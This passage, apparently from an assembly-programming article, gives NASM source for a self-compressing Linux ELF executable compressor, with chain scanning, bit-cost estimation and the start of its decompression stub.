2+(8*2)+8+(2*2) = 28 bits without, 26 bits with this implementation.


Intro for COMPRESS...
---------------------
Some equivalents:

DECOMPRESS         COMPRESS
MOV DL,80h         CALL o_c_0         ; setup helper_control_bit
CALL GET_NEXT_BIT  CALL PUT_BIT

Routines for scan chains, calculate bit request for pack this chain, pack
chain, some optimalizations for found better chains are in source code.

Source is ELF compressor, but this isn't universal ELF compressor. It
support
ELF header included in the source only. This header is enough for LINUX NASM
use. You can download sources as well binaries from:

http://feryno.home.sk/projects/compressELF.tar.gz

; ----- CUT HERE -----

; fy1ename: a00.asm
; dezkrypt: ASM, ELF, k0mprezz0r, myny, exekutab1e
; Au~tchor: ch lap aj   Feryno
; kompy1e:
; nasm -f bin a00.asm
; chmod +x a00
; example of use
; ./a00 a00 compressed_a00
; this self compress compressor

BITS 32

                 org     08048000h

ehdr:                                           ; Elf32_Ehdr
                 db      7Fh, 'ELF', 1, 1, 1     ;   e_ident
         times 9 db      0
                 dw      2                       ;   e_type
                 dw      3                       ;   e_machine
                 dd      1                       ;   e_version
                 dd      START                   ;   e_entry
                 dd      phdr - $$               ;   e_phoff
                 dd      0                       ;   e_shoff
                 dd      0                       ;   e_flags
                 dw      ehdrsize                ;   e_ehsize
                 dw      phdrsize                ;   e_phentsize
phdr:                                                           ; Elf32_Phdr
                 dw      1                       ;   e_phnum     ;   p_type
                 dw      0                       ;   e_shentsize
                 dw      0                       ;   e_shnum     ;   p_offset
                 dw      0                       ;   e_shstrndx
ehdrsize        equ     $ - ehdr
                 dd      $$                                      ;   p_vaddr
                 dd      $$                                      ;   p_paddr
                 dd      filesize                                ;   p_filesz
                 dd      memsize                                 ;   p_memsz
                 dd      111b                                    ;   p_flags
;                       EWR
;Exec,Write,Read
                 dd      1000h                                   ;   p_align
phdrsize        equ     $ - phdr

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

START:

         pop     ebx     ; pop number of strings in comand line , must be =3
         dec     ebx
         dec     ebx
         dec     ebx     ; set zero flag if after this EBX=0
         pop     ebx     ; offset of first string ( executable file )
         jz      short mode ; number of strings = 3 = executable + file0 +
file1
use:    mov     ecx,usage
         xor     edx,edx
         mov     dl,usagesize
;;;     call    WS
         jmp     short ex00

mode:   pop     ebx     ; pop offset of second string (first string, 0,
second
                         ; string, 0, third...)

open:   mov     edi,f0h
         cld

; ebx is now pointed to second string in a shell = in_file
open_f: xor     ecx,ecx ; open flags, open for read-only
;       xor     eax,eax
;       mov     al,5    ; sys_open
         db      6Ah,5   ; push dword 5
         pop     eax
         int     80h     ; open , note - return HANDLE in EAX
         or      eax,eax
         jns     short OK_open
         mov     ecx,MEOF
;       xor     edx,edx
;       mov     dl,MEOFS
         db      6Ah,MEOFS       ; push dword MEOFS
         pop     edx
;;;     call    WS
ex00:   jmp     short ex01
OK_open:stosd           ; store file handle

         pop     ebx     ; EBX pointed to second filename out_file
         mov     ecx,111101101b  ; 111 owner can read, write, execute, 101
group
can read, execute, but don't write / search, other 101 as well groups
;       xor     eax,eax
;       mov     al,8    ; sys_creat
         db      6Ah,8   ; push dword 8
         pop     eax
         int     80h     ; creat , note - return HANDLE in EAX
         or      eax,eax
         jns     short OK_creat
         mov     ecx,MECF
;       xor     edx,edx
;       mov     dl,MECFS
         db      6Ah,MECFS       ; push dword MECFS
         pop     edx
;;;     call    WS
ex01:   jmp     short ex02
OK_creat:stosd          ; store file handle

                         ; EDI=f0s
         mov     ebx,dword [edi - 4*2]   ; handle for in_file
         xor     ecx,ecx ; ECX=0 seek 0 bytes
;       xor     edx,edx
;       inc     edx
;       inc     edx     ; EDX=2 seek to end of file + ECX=0 bytes
         db      6Ah,2   ; push dword 2
         pop     edx
;       xor     eax,eax
;       mov     al,13h  ; sys_seek
         db      6Ah,19  ; push dword 19
         pop     eax
         int     80h     ; note - return filesize in EAX
         or      eax,eax
         jns     short OK_seek_to_end
         mov     ecx,MSEEF
;       xor     edx,edx
;       mov     dl,MSEEFS
         push    byte MSEEFS
         pop     edx
;;;     call    WS
ex02:   jmp     short ex03
OK_seek_to_end:
;;;     or      eax,eax
;;;     jz      ex04    ; filesize=0 -> this file needn't compression
         cmp     eax,f0b_size
         jnbe    ex04    ; LIMIT f0b_size OVERFLOW !!!!!!
         cmp     eax,4Ch
         jbe     ex04    ; can't be a ELF executable, ELF header require 4C
                         ; bytes
         stosd           ; store in_file size to f0s_2
         stosd           ; store in_file size to f0s
         push    eax     ; and push it to stack

         xor     ecx,ecx ; seek 0 bytes
         xor     edx,edx ; seek to begin of file + ECX=0 bytes
;       xor     eax,eax
;       mov     al,13h
         db      6Ah,19  ; push dword 19
         pop     eax
         int     80h
         or      eax,eax
         jns     short OK_seek_to_begin
         mov     ecx,MSEBF
;       xor     edx,edx
;       mov     dl,MSEBFS
         db      6Ah,MSEBFS      ; push dword MSEBFS
         pop     edx
;;;     call    WS
ex03:   jmp     short wsex04
OK_seek_to_begin:

         mov     esi,fy1eObuffer
         mov     edi,f1b

read_f: mov     ecx,esi
         pop     edx     ; pop in_file_size from stack
;       xor     eax,eax
;       mov     al,3    ; sys_read
         db      6Ah,3   ; push dword 3
         pop     eax
         int     80h     ; note - return in EAX number of bytes read
(negative
                         ; value if error)
         cmp     eax,edx
         jz      short OK_read
oops:   mov     ecx,MERF
;       xor     edx,edx
;       mov     dl,MERFS
         db      6Ah,MERFS       ; push dword MERFS
         pop     edx
wsex04: call    WS
ex04:   jmp     long ex05       ;short ex05
OK_read:

         add     eax,esi
         mov     dword [konyc_dat],eax
;       mov     ecx,4Ch         ; header size
         db      6Ah,4Ch         ; push dword 4Ch
         pop     ecx
         sub     dword [f0s],ecx
         repz movsb
         push    esi
         mov     esi,uncompress_routine
         mov     cl,uncompress_routine_size
         repz movsb
         pop     esi

; all self compressing is below this:

         movsb           ; first byte, store it, this byte can't be
compressed
         call    o_C_0   ; setup [position] and byte on [position]
         dec     dword [f0s]
         jz      near terminate002

;       xor     eax,eax
;       mov     dword [last_delta],eax  ; I know : all data in UDATASEG is
zero
;                                       ; but use dirty tricks and must be
sure
;                                       ; dword [last_delta] can be non zero
if
;                                       ; compressed fy1e overwrite
;                                       ; [last_delta] but i hope that
;                                       ; compressed will be smaller as
;                                       ; original executable
         call    progress

compress002:

         call    scan002

; some optimalizations for found better chain as chain by scan0002
         cmp     eax,1
         jbe     near    cant_optimize_002_L0
; on ESI is EAX lenght chain
; explore if on SI isn't chain with no change delta - if it's use this chain
         call    scanincd        ; include procedure in scan_ncd.inc
         jc      cant_optimize_002_L1
         mov     ebx,dword [last_delta]
; pack without change delta has superior pack priority ( the best pack ratio
)
         jmp     near    A08_new_optimalization

cant_optimize_002_L1:
         xchg    dword [last_delta],ebx
         push    ebx
         push    eax
         push    esi
         add     esi,eax
         stc
         cmp     dword [konyc_dat],esi
         jz      chumaj
         inc     esi
         cmp     dword [konyc_dat],esi
         jz      chumaj
         call    scan002
         call    scanincd
chumaj: pop     esi
         pop     eax
         pop     ebx
         xchg    dword [last_delta],ebx
         jnc     near    cant_optimize_002_L0

skus_toto_L0:
         push    ebx
         push    eax
         inc     esi
         call    scan002
         call    scanincd
         dec     esi             ; DEC don't change Carry !!!
         xchg    ecx,eax         ; number of bytes to ECX
                                 ; XCHG don't change Carry !!!
         pop     eax             ; POP don't change Carry !!!
         pop     ebx
         jc      try_next_optimalization
; use chain without change delta require less bits for pack ?
         call    bitreq_02
         push    edx             ; number of bits for pack non-optimized
chain
         xchg    ecx,eax         ; number of bytes of non-optimized chain ->
CX
                         ; number of bytes of chain without change delta ->
AX
         push    ebx
         mov     ebx,dword [last_delta]  ; make EBX = EBX in last pack_02
         call    bitreq_02       ; return EDX = number of bits for pack chain
                                 ; without change delta
         pop     ebx

         push    edx
         push    eax
         xor     eax,eax         ; simulate pack 1 byte first ( before chain
                                 ; without change delta )
         call    bitreq_02
         pop     eax
         add     dword [esp+0*4],edx
         pop     edx
         xchg    ecx,eax         ; restore EAX = number of bytes of
                                 ; non-optimized chain
         inc     ecx             ; number of bytes for pack optimized chain
         cmp     eax,ecx
         pop     ecx             ; number of bits for pack non-optimized
chain
         jc      near    pack_1_byte_look_better
         cmp     edx,ecx
         jc      near    pack_1_byte_look_better

try_next_optimalization:

         cmp     eax,3
         jc      try_old_optimalization
         push    ebx
         push    eax
         inc     esi
         inc     esi
         call    scan002
         call    scanincd
         dec     esi
         dec     esi
         xchg    ecx,eax         ; number of bytes to ECX
                                 ; XCHG don't change Carry !!!
         pop     eax             ; POP don't change Carry !!!
         pop     ebx
         jc      try_old_optimalization
; use chain without change delta require less bits for pack ?
         call    bitreq_02
         push    edx             ; number of bits for pack non-optimized
chain
         xchg    ecx,eax         ; number of bytes of non-optimized chain ->
CX
                         ; number of bytes of chain without change delta ->
AX
         push    ebx
         mov     ebx,dword [last_delta]  ; make EBX = EBX in last pack_02
         call    bitreq_02       ; return EDX = number of bits for pack chain
                                 ; without change delta
         pop     ebx

         push    edx
         push    eax
         xor     eax,eax         ; simulate pack 1 byte first ( before chain
                                 ; without change delta )
         call    bitreq_02
         pop     eax
         add     dword [esp+0*4],edx
         pop     edx
         xchg    ecx,eax         ; restore EAX = number of bytes of
                                 ; non-optimized chain
         inc     ecx
         inc     ecx             ; number of bytes for pack optimized chain
         cmp     eax,ecx
         pop     ecx             ; number of bits for pack non-optimized
chain
         jc      near    pack_1_byte_look_better
         cmp     edx,ecx
         jc      near    pack_1_byte_look_better

try_old_optimalization:
         push    esi
         add     esi,eax
         cmp     dword [konyc_dat],esi
         pop     esi
         jz      near    L_NO_0

         call    bitreq_02

         push    ebx
         push    eax
         push    edx
         push    eax

         push    esi
         add     esi,eax
         call    scan002
         call    bitreq_02
         pop     esi
         add     dword [esp+0*4],eax
         add     dword [esp+1*4],edx

         xor     eax,eax
         call    bitreq_02
         push    edx
         inc     esi
         call    scan002
         call    bitreq_02
         dec     esi
         add     dword [esp+0*4],edx
         pop     edx             ; EDX=bits required by pack 1 byte first
         inc     eax             ; EAX=bytes packed in 2 steps , pack 1 byte
                                 ; first

         cmp     dword [esp+0*4],eax
         jc      obnov_to
;;;     clc
         jnz     obnov_to
         cmp     edx,dword [esp+1*4]
obnov_to:
         pop     eax
         pop     edx
         pop     eax
         pop     ebx
         jc      near    pack_1_byte_look_better

A08_new_optimalization:
         cmp     eax,3
         jc      near    can_t_use_new_optimalization_08
         push    esi
         add     esi,eax
         inc     esi
         inc     esi
         inc     esi             ; it's very unhappy idea fucking near the
death
                                 ; this isn't usefull for try code marked
                                 ; DANGEROUS for last 3 bytes because this
can
                                 ; be unstable (data in f0b overleap)
         cmp     dword [konyc_dat],esi
         pop     esi
         jbe     this_is_it
         xchg    dword [last_delta],ebx
         push    ebx
         push    eax
         push    esi
         add     esi,eax
         inc     esi             ; DANGEROUS , ESI+1
         call    scan002
         call    scanincd        ; DANGEROUS , must be ESI + 1 + EAX (where
                                 ; EAX > 1)
         pop     esi             ; DEC instruction don't change Carry (=CF)
!!!
         pop     eax             ; POP instruction don't change Carry (=CF)
!!!
         pop     ebx
         xchg    dword [last_delta],ebx  ; XCHG instruction don't change
Carry
                                         ; (=CF) !!!
         jnc     can_t_use_new_optimalization_08

this_is_it:
         push    ebx
         push    eax
         push    edx     ;db     6Ah,0   ; push dword 0  ; bits count=0 but
will
                                         ; be overwrited first time because
                                         ; chain > 0 bytes will be found
         db      6Ah,0   ; push dword 0  ; chain lenght counter

new_optimalization_08_L0:
         call    scan_lim                ; scan EAX chain lenght, return min.
                                         ; EBX
         call    scanincd
         jc      new_optimalization_08_L1
         mov     ebx,dword [last_delta]
new_optimalization_08_L1:
         call    bitreq_02
         push    edx
         push    eax
         push    esi
         xchg    dword [last_delta],ebx
         push    ebx
         add     esi,eax
         call    scan002
         call    bitreq_02
         pop     ebx
         xchg    dword [last_delta],ebx
         pop     esi
         add     eax,dword [esp+0*4]
         xchg    ecx,eax
         pop     eax
         add     dword [esp+0*4],edx
         pop     edx
         cmp     dword [esp+0*4],ecx
         jc      toto_bude_asy_lepseeeee
         jnz     toto_bude_asy_horse
         cmp     dword [esp+1*4],edx
         jbe     toto_bude_asy_horse

toto_bude_asy_lepseeeee:
;       mov     dword [esp+2*4],ax
;       mov     dword [esp+3*4],bx
;       mov     dword [esp+0*4],cx
;       mov     dword [esp+1*4],dx
         add     esp, byte 4*4
         push    ebx
         push    eax
         push    edx
         push    ecx
toto_bude_asy_horse:

         dec     eax
         cmp     eax,1
         jnz     new_optimalization_08_L0

         pop     eax
         pop     eax
         pop     eax
         pop     ebx
can_t_use_new_optimalization_08:

L_NO_0:

         cmp     eax,9           ; under 32 bit opcodes it's enough  for 1 MB
                                 ; data block
                                 ; 16 bit delta is less than 64 kB and
require
                                 ; max. 4 bytes for calculate it
                                 ; Summa: Under DOS its enough use CMP AX,4
                                 ;        because small value is fast
algorithm
                                 ;        Under 32 bit OS ( Linux, NT 4.0 )
use
                                 ;        big value if big data block
                                 ;        9 is enough for 4 GB of data block
                                 ;        Who can produce 4 GB of ASM code
???
         jnc     cant_optimize_002_L0
; i have chain with AX <2,0Fh> and try pack 1 byte AX times
         push    eax
         db      6Ah,0   ;push   0000h           ; bits require counter
         push    eax             ; pack 1 byte AX times
optimize_002_L2:
         xor     eax,eax
         call    bitreq_02       ; include procedure in bitreq02.inc
         inc     esi
         add     dword [esp+1*4],edx     ; bits require counter
         dec     dword [esp+0*4] ; pack 1 byte EAX times
         jnz     optimize_002_L2 ; simulate pack 1 byte EAX times
         pop     eax             ; remove word from stack only
         pop     ecx             ; ECX = required bits count for pack 1 byte
EAX
                                 ; times
         pop     eax             ; restore EAX
         sub     esi,eax         ; restore ESI

         call    bitreq_02       ; explore once-pack EAX bytes EBX delta bits
                                 ; count
                                 ; return EDX=bits required
         cmp     edx,ecx
         jc      cant_optimize_002_L0
; use JC for prefer pack 1 byte EAX times
; use JBE for prefer once-pack EAX bytes with delta = EBX
; JC is sometimes better because pack 1 byte don't change delta and it's
; possibility pack without change delta ( call scanincd ) later
; JC has better ratio in my experiments by aprox 1 byte per 1 kB of data but
; this depend on data structure and sometimes JBE can be more rational if
; change delta and later pack with this new delta without change delta

; O.K. pack 1 byte now
pack_1_byte_look_better:
         xor     eax,eax
; now will be packed last 1 byte by call pack002 in a00.asm
; EAX=0

cant_optimize_002_L0:

         call    pack002

         add     esi,eax
         sub     dword [f0s],eax
         pushfd
         call    progress
         popfd
         jnz     near compress002        ; jnz don't handle error if packing
                                         ; more bytes as bytes in f0buffer
                                         ; jnbe is better
         mov     ecx,progress_text
         xor     edx,edx
         inc     edx
         mov     byte [ecx],0Ah
         call    WS

terminate002:

         call    putbit1
         call    putbit1

         xor     eax,eax
         stosb

         mov     ebx,dword [position]
         stc
         rcl     byte [ebx],1
         jc      done_002

flush:  shl     byte [ebx],1
         jnc     flush                   ; shift all control_bits and remove
                                         ; highest ( highest was put in MOV
BYTE
                                         ; PTR DS:[DI],1 , INC DI )

done_002:

after_compress:

; modifying data for fill pointer registers in output file

; calculate boundary of moved data
         mov     ecx,f1b
         mov     eax,edi
         sub     eax,f1b - 08048000h + 1
         mov     dword [ecx+4Fh],eax     ; esi value

         mov     eax,edi
         sub     eax,f1b+4Ch+fuyi - 08048000h + 1
         add     eax,dword [ecx+40h]
         mov     dword [ecx+54h],eax     ; edi value

; calculate size of moved data
         mov     eax,edi
         sub     eax,f1b+4Ch+fuyi
         mov     dword [ecx+59h],eax     ; ecx value

; calculate offset after uncompress_routine (esi)
         mov     eax,dword [ecx+40h]
         add     eax,08048000h + uncompress_routine_end - uncompress_moved
         mov     dword [ecx+69h],eax     ; esi value

; calculate offset of moved U13 (ebp)
         sub     eax, byte (uncompress_routine_end - U13)
         mov     dword [ecx+6Eh],eax     ; ebp value

; calculate JUMP
         mov     eax,dword [ecx+18h]
         sub     eax,dword [ecx+40h]
         sub     eax,08048000h + uncompress_routine_end - uncompress_moved
         mov     dword [f1b+0D9h],eax    ;[ecx+0D9h],eax

; modify data in a header
         mov     dword [ecx+18h],0804804Ch       ; START

         mov     eax,edi
                                 ; ECX=f1b
         sub     eax,ecx         ; sub   eax,f1b
         mov     dword [ecx+3Ch],eax             ; filesize

         sub     eax, byte ( fuyi + 4Ch + 1 )
         add     dword [ecx+40h],eax             ; memorysize

         mov     byte [ecx+44h],111b             ; Exec,Write,Read

; O.K. going write output...
         mov     ebx,dword [f1h]
                         ; ECX=f1b
;;;     mov     ecx,f1b
         mov     edx,edi
         sub     edx,ecx
;       xor     eax,eax
;       mov     al,4    ; sys_write
         db      6Ah,4   ; push dword 4
         pop     eax
         int     80h
         cmp     eax,edx
         jz      OK_write
         mov     ecx,MEWF
;       xor     edx,edx
;       mov     dl,MEWFS
         db      6Ah,MEWFS       ; push dword MEWFS
         pop     edx
         call    WS
ex05:   jmp     short   exit
OK_write:

         mov     esi,f0h

         lodsd
         xchg    ebx,eax
;       xor     eax,eax
;       mov     al,6    ; sys_close
         db      6Ah,6   ; push dword 6
         pop     eax
         int     80h
         lodsd
         xchg    ebx,eax
;       xor     eax,eax
;       mov     al,6    ; sys_close
         db      6Ah,6   ; push dword 6
         pop     eax
         int     80h

exit:
         xor     ebx,ebx
;       xor     eax,eax
;       inc     eax
         db      6Ah,1
         pop     eax     ; this is better for compress as xor eax,eax inc eax
                         ; sys_exit
         int     80h

WS:     xor     ebx,ebx
         inc     ebx     ; EBX=1 (STDOUT)
;       xor     eax,eax
;       mov     al,4    ; write
         db      6Ah,4   ; push dword 4
         pop     eax
         int     80h
         ret

; -------

scan002:
; input:  chain on ESI
; return: EAX max. lenght ( 0 or 1 for chain not found ) , EBX delta

         push    esi
         push    edi
         xor     edx,edx         ; chain lenght counter
         mov     edi,f0b
         mov     ecx,esi
         sub     ecx,edi
         lodsb
scan_L00:
         jecxz   scan_L04
         repnz scasb
         jnz     scan_L04
         push    eax
         push    ecx
         push    esi
         push    edi
         mov     eax,dword [konyc_dat]
         sub     eax,esi
         mov     ecx,eax
         jecxz   scan_L03
scan_L01:
         repz cmpsb
         jnz     scan_L02
         inc     eax             ; last byte is in chain and must be
encountered
scan_L02:
         sub     eax,ecx
         cmp     eax,1           ; chain must be minimal 2 bytes long
         jbe     scan_L03
         cmp     eax,edx
         jc      scan_L03
         xchg    edx,eax
         mov     ebx,esi
         sub     ebx,edi         ; EBX=shift=deta
scan_L03:
         pop     edi
         pop     esi
         pop     ecx
         pop     eax
         jmp     short   scan_L00
scan_L04:
         pop     edi
         pop     esi
         xchg    edx,eax
         ret

; -------

scan_ncd:
; input:  chain on ESI , EAX requested lenght with shift = [last_delta]
; return: EAX max. lenght ( 0 or 1 for chain not found )
         cmp     dword [last_delta], byte 0
         jnz     mozno_aj_bude
         xor     eax,eax
         ret
mozno_aj_bude:
         push    ecx
         push    esi
         push    edi
         mov     edi,esi
         sub     edi,dword [last_delta]
         mov     ecx,eax
         repz cmpsb
         pop     edi
         pop     esi
         jnz     scan_ncd_0
         inc     eax             ; last byte is in chain and must be
encountered
scan_ncd_0:
         sub     eax,ecx
         pop     ecx
         ret


scanincd:
; input:  chain on ESI , EAX requested lenght with shift = [last_delta]
; return: CLC ( Carry Flag = 0 ) if chain found , STC (CF=1) if not found
         cmp     dword [last_delta], byte 0
         jnz     mozno_aj_bude_0
         stc
         ret
mozno_aj_bude_0:
         push    ecx
         push    esi
         push    edi
         mov     edi,esi
         sub     edi,dword [last_delta]
         mov     ecx,eax
         repz cmpsb
         pop     edi
         pop     esi
         jnz     nebude_any_ket_sa_zesere_z_blbych_pocytov
         jecxz   zeserau_sa_z_blbych_pocytov
nebude_any_ket_sa_zesere_z_blbych_pocytov:
         stc
         pop     ecx
         ret
zeserau_sa_z_blbych_pocytov:
         clc
         pop     ecx
         ret

; -------

scan_lim:
; input:  chain on ESI , EAX chain lenght , EAX > 1
; return: EBX minimal delta
; this procedure is usefull for call after call scan002 for scan shorter
chains
; on this some ESI
; call scan_lim assume that on ESI is chain with {EAX}
<3,max_register_limit>
; call scan_lim with EAX = {EAX}-1, {EAX}-2, {EAX}-3, ... , 3, 2
; {EAX} is value returned after call scan002
         push    ecx
         push    edi
         mov     edi,esi
scan_lim_L00:
         dec     edi
;       cmp     edi,f0b         ; call scan_lim assume that longer chain was
;                               ; found
;       jc      scan_lim_L00
         mov     ecx,eax
         push    esi
         push    edi
         repz cmpsb

         pop     edi
         pop     esi
         jnz     scan_lim_L00
         jecxz   scan_lim_L01
         jmp     short   scan_lim_L00
scan_lim_L01:
         mov     ebx,esi
         sub     ebx,edi
         pop     edi
         pop     ecx
         ret

; -------

bitreq_02:
; input  : EAX = number of bytes for pack request
;          EBX = shift = delta ( if EAX = 2 or more )
; output : EDX = number of bits required for pack
; destroy: nothing

         cmp     eax,1
         jnbe    bitreq_more_bytes

bitreq_1_byte:

         db      6Ah,7   ; push doubleword 7
         pop     edx     ; make EDX=7

; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16
; if this can't be used , pack by use 9 bits can be always used

; byte for compress is = 00h ?
         cmp     byte [esi],0
         jz      bitreq_7_bits   ; 7 bits required ( sequence 1100000 )

bitreq_jak_skusas_co_skusas:
; byte isn't = 00h but explore if found equal byte with shift < 16
         push    eax
         mov     al,byte [esi]
         push    ecx
;       xor     ecx,ecx
;       mov     cl,15
         db      6Ah,15
         pop     ecx
         push    edi
         mov     edi,esi
         sub     edi,ecx
         cmp     edi,f0b
         jnc     bitreq_pome_skusat
         mov     edi,f0b
         mov     ecx,esi
         sub     ecx,edi
bitreq_pome_skusat:
         repnz scasb
         pop     edi
         pop     ecx
         pop     eax
         jz      bitreq_7_bits

; always can be used this mode but has bad pack ratio
; pack 1 byte , use 9 bits ( 1 byte + 1 bit )
         mov     dl,9
bitreq_7_bits:
         mov     al,1            ; 1 byte packed EAX=1
         ret

bitreq_more_bytes:

         cmp     ebx,dword [last_delta]
         jnz     bitreq_another_delta

bitreq_old_delta:
         bsr     edx,eax         ; ( bits / 2 ) for calculate bytes count
         lea     edx,[2*edx+4]   ; 4 bits sequence 1000 don't calculate new
                                 ; delta
         ret

bitreq_another_delta:
         cmp     ebx,byte 7Fh                            ; cmp ebx,7Fh
require 3
                                                         ; bytes
         jnbe    bitreq_big_delta_or_more_bytes
         cmp     eax,4
         jnc     bitreq_big_delta_or_more_bytes

; pack 2 or 3 bytes with delta <+0001h,+007Fh>
         db      6Ah,8+3
         pop     edx     ;mov    edx,8+3                 ; 8 bit = 1 byte for
                                                         ; MOV BL,[ESI]  INC
ESI
         ret                             ; 3 bit sequence 111 switch to this
                                         ; mode

bitreq_big_delta_or_more_bytes:
; pack 4 or more bytes with delta <+0001h,maximal_delta)
; pack 2 or more bytes with delta <+0080h,maximal_delta)
         push    eax
         push    ebx

         cmp     ebx,byte 7Fh
         jnbe    bitreq_high_delta
         dec     eax
         dec     eax             ; invert for 2x INC ECX in decompress

bitreq_high_delta:
         bsr     eax,eax         ; (bits/2)  for calculate count

         shr     ebx,8           ; remove BL part of delta
         inc     ebx
         inc     ebx
         inc     ebx             ; invert for 3x DEC EBX in decompress
         bsr     ebx,ebx         ; (bits/2) for calculate delta without BL

         add     eax,ebx
         lea     edx,[2*eax+2+8] ; 2 bit sequence for switch to this mode
                                  ; 8 bit=1 byte for MOV BL,[ESI]   INC ESI
         pop     ebx
         pop     eax
         ret

; -------

pack002:
; input :  EAX = number of bytes for pack request
;          EBX = shift = delta ( if AX = 2 or more )
; output : EAX = number of bytes packed
         cmp     eax,1
         jnbe    pack_more_bytes

pack_1_byte:

; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16
; if this can't be used , pack by use 9 bits can be always used

; byte for compress is = 00h ?
         mov     al,byte [esi]
         or      al,al
         jz      common_7_bits   ; putbit sequence 1100000

jak_skusas_co_skusas:
; byte isn't = 00h but explore if found equal byte with shift < 16
         xor     ecx,ecx
         mov     cl,15
         push    edi
         mov     edi,esi
         sub     edi,ecx
         cmp     edi,f0b
         jnc     pome_skusat
         mov     edi,f0b
         mov     ecx,esi
         sub     ecx,edi
pome_skusat:
         repnz scasb
         pop     edi
         jnz     jerk_it_off_and_try_again
         xchg    ecx,eax
         inc     eax             ; EAX = shift (possitive value)

common_7_bits:

         call    putbit1
         call    putbit1
         call    putbit0
         mov     cl,4
         shl     al,cl
pbimu7: shl     al,1
         call    putbit
         loop    pbimu7

         jmp     short   pack_1_byte_common_end

jerk_it_off_and_try_again:
; always can be used this mode but has bad pack ratio
; pack 1 byte , use 9 bits ( 1 byte + 1 bit )
         movsb
         dec     esi             ; restore ESI to ESI before pack
         call    putbit0

pack_1_byte_common_end:

         xor     eax,eax
         inc     eax             ; 1 byte packed EAX=1

         ret

pack_more_bytes:

         push    eax             ; store EAX for restore number of bytes
packed
                                 ; ( by POP EAX )
         cmp     ebx,dword [last_delta]
         jnz     another_delta

pack_with_old_delta:
         call    putbit1
         call    putbit0
         call    putbit0
         call    putbit0         ; sequence 1000 don't calculate new delta

         mov     ecx,32
fdcd:   dec     ecx
         shl     eax,1
         jnc     fdcd            ; shift bits left and remove highest bit=1
                                 ; this bit will be put by INC CX in
decompress
mocd:   shl     eax,1
         call    putbit
         dec     ecx
         jz      mwocd
         call    putbit1
         jmp     short   mocd
mwocd:  call    putbit0
         pop     eax             ; packed EAX bytes from input buffer
         ret

another_delta:
         mov     dword [last_delta],ebx  ; all modes change last_delta
;       cmp     ebx,80h                 ; cmp ebx,80h require 6 bytes
;       jnc     big_delta_or_more_bytes
         db      83h,0FBh,7Fh    ;cmp    ebx,7Fh    ; cmp bx,7Fh require 3
bytes
         jnbe    big_delta_or_more_bytes
         cmp     eax,4
         jnc     big_delta_or_more_bytes

; pack 2 or 3 bytes with delta <+0001h,+007Fh>
         call    putbit1
         call    putbit1                 ; bit sequence 111 switch to this
mode
                                         ; third bit 1 will be passed at end
of
                                         ; packing before POP AX
         sub     al,3                    ; value 2 -> CF=1, value 3 -> CF=0
         adc     bl,bl
         xchg    ebx,eax
         stosb
         call    putbit1                 ; put last control bit must be after
                                         ; STOSB (for mov bl,[esi] , inc esi)
                                         ; because when decompress , bits are
                                         ; processed first and byte second ->
                                         ; when compressing , byte must be
                                         ; processed before last bit
         pop     eax                     ; value 2 or 3
                                         ;     -> this mode process 2 or 3
bytes
         ret

big_delta_or_more_bytes:
; pack 4 or more bytes with delta <+0001h,maximal_delta)
; pack 2 or more bytes with delta <+0080h,maximal_delta)
         call    putbit1
         call    putbit0

         db      83h,0FBh,7Fh    ;cmp    ebx,7Fh
         jnbe    high_delta
         dec     eax
         dec     eax                     ; invert for 2x INC ECX in
decompress
high_delta:

         push    eax
         xchg    ebx,eax
         push    eax             ; push only for part in BL moved to AL
         shr     eax,8           ; this destroy AL
         inc     eax
         inc     eax
         inc     eax             ; invert for 3x DEC EBX

         mov     ecx,32
fgfaad: dec     ecx
         shl     eax,1
         jnc     fgfaad

wetryw: shl     eax,1
         call    putbit
         dec     ecx
         jz      shsdwd
         call    putbit1
         jmp     short   wetryw
shsdwd: call    putbit0
         pop     ebx             ; pop only for BL
         pop     eax             ; pop bytes count

calculate_count:
         mov     ecx,32
fcdcd:  dec     ecx
         shl     eax,1
         jnc     fcdcd           ; shift all bits left and remove highest
bit=1
                                 ; this bit will be put by INC ECX in
decompress
mwocdl: shl     eax,1
         call    putbit
         dec     ecx
         jz      mwocdt
         call    putbit1
         jmp     short   mwocdl
mwocdt:
         xchg    ebx,eax
         stosb                   ; store AL (BL in decompress)
                                 ; as well in delta <+0001h,+007Fh> , stored
                                 ; byte must be before store last bit because
                                 ; when decompress, bit will be processed
                                 ; first and byte will be loaded later

         call    putbit0         ; this bit will be processed in
                                 ; decompress for calculate ECX ( JC U05 )

         pop     eax             ; packed EAX bytes from input buffer
         ret

; -------

; putbit input  :  Carry Flag (CF=0,CF=1)
;        output :  bit 0. in [position], EDI+1 as need for store bit to
[EDI]
;        destroy:  nothing

putbit0:clc                             ; put bit=0
         jmp     short putbit
putbit1:stc                             ; put bit=1
putbit: push    ebx
         mov     ebx,dword [position]
         rcl     byte [ebx],1
         pop     ebx
         jnc     o_C_1
o_C_0:  mov     byte [edi],1
         mov     dword [position],edi
         inc     edi
o_C_1:  ret

; -------

progress:
         pushad
         mov     esi,f0s_2
         mov     edi,progress_text+1
         mov     ebp,w1hch

         lodsd
         push    eax
         sub     eax,dword [esi]

         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp

         inc     edi
         inc     edi
         pop     eax

         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp

         mov     ecx,progress_text
         xor     edx,edx
         mov     dl,progress_text_size
         call    WS
         popad
         ret

w1hch:  push    eax
         and     al,00001111b
         cmp     al,10
         sbb     al,69h
         das
         stosb
         pop     eax
         ret

; -------

uncompress_routine:
         pushfd
         pushad
         mov     esi,0
         mov     edi,0
         mov     ecx,0
         std
         repz movsb
         cld
         xchg    esi,edi
         inc     esi
         db      83h,0EFh,fuyi - 1       ; sub edi,fuyi-1
         push    esi
         mov     esi,0
         mov     ebp,0           ; U13
         mov     dl,80h
         ret

fuyi    equ     $ - uncompress_routine

uncompress_moved:
         push    eax

U00:    movsb
U01:    call    ebp
         jnc     U00

         xor     ebx,ebx
         call    ebp
         inc     ecx
         jnc     U03

         call    ebp
         jc      U06

